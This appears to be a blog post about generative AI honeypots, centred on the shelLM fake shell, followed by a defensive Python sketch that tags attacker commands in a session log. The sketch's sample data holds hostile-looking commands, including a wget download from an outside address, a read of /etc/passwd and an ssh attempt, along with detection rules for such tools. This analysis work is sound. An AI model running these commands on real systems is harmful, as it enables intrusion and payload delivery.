AI and Cybersecurity: LLM in the Shell: Generative Honeypots
Like many of you, I am interested in learning more about AI and how it is transforming cybersecurity. Through a series of posts, I will explore various AI tools and their impact on cybersecurity. These use cases might be helpful to you.
Disclaimer: Everything I cover here and in future articles is based on my personal research and does not reflect the opinions of my current or previous employers.
Generative Honeypots
Honeypots are both fascinating and educational as they allow us to understand attackers better while distracting them. But how can we leverage generative AI for honeypots? A great research paper by Muris Sladić, Veronica Valeros, Carlos Catania, and Sebastian Garcia explores this concept. You can find it here: https://arxiv.org/abs/2309.00155.
They created shelLM, an LLM-based Linux shell. It's an innovative idea, and you can clone the GitHub repository here: https://github.com/stratosphereips/shelLM/blob/main/README.md.
I’ve also tested some prompts using the YAML file, and the responses look impressively realistic.
Of course, more work remains to be done. For example, automated behavior analysis of attackers would be a nice feature. Also, if you try to ssh into other computers in the network, you are always denied. It would be nice to trick attackers further by allowing, or simulating, deeper movement into the network.
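To make the behavior-analysis idea concrete, here is a small sketch that tags the commands recorded in a honeypot session and lists the hosts a visitor tried to reach over ssh. It is an added example, not code from shelLM or the paper; the session format, the rule set and all names in it are assumptions.

```python
import re
import shlex

# Constructed sample session; one recorded input line per entry (format assumed).
SESSION = [
    "whoami; uname -a",
    "cat /etc/passwd",
    "wget http://203.0.113.5/a.sh -O /tmp/a.sh",
    "ssh -p 2222 admin@10.0.0.12",
    "echo 'unterminated",
]
# Hypothetical tag -> command-name rules; extend for your environment.
RULES = {
    "discovery": {"whoami", "id", "uname", "ps", "ip", "ifconfig", "netstat"},
    "download": {"wget", "curl", "tftp"},
    "lateral_movement": {"ssh", "scp", "telnet"},
}
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", ".ssh/")
SSH_OPTS_WITH_VALUE = {"-p", "-i", "-l", "-o"}

def parse(line):  # split on ; && || | (naive: ignores quoting), tokenize each part
    for part in re.split(r"\|\||&&|[;|]", line):
        try:
            argv = shlex.split(part)
        except ValueError:  # unbalanced quotes typed by the visitor
            argv = part.split()
        if argv:
            argv[0] = argv[0].rsplit("/", 1)[-1]  # /usr/bin/wget -> wget
            yield argv

def classify(line):  # behaviour tags for one recorded input line
    tags = set()
    for name, *args in parse(line):
        tags |= {tag for tag, names in RULES.items() if name in names}
        if any(p in arg for arg in args for p in SENSITIVE_PATHS):
            tags.add("credential_access")
    return tags or {"other"}

def ssh_targets(session):  # hosts tried with ssh (first non-option argument)
    hosts = []
    for _, *args in (a for line in session for a in parse(line) if a[0] == "ssh"):
        it = iter(args)
        for arg in it:
            if arg in SSH_OPTS_WITH_VALUE:
                next(it, None)  # skip the option's value
            elif not arg.startswith("-"):
                hosts.append(arg.split("@")[-1])
                break
    return hosts
```

Running `classify` over each line of a session gives a per-command tag set, and `ssh_targets` shows which internal addresses the visitor believed were worth reaching.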
In my next post, I’ll cover a web-based honeypot that utilizes large language models (LLMs).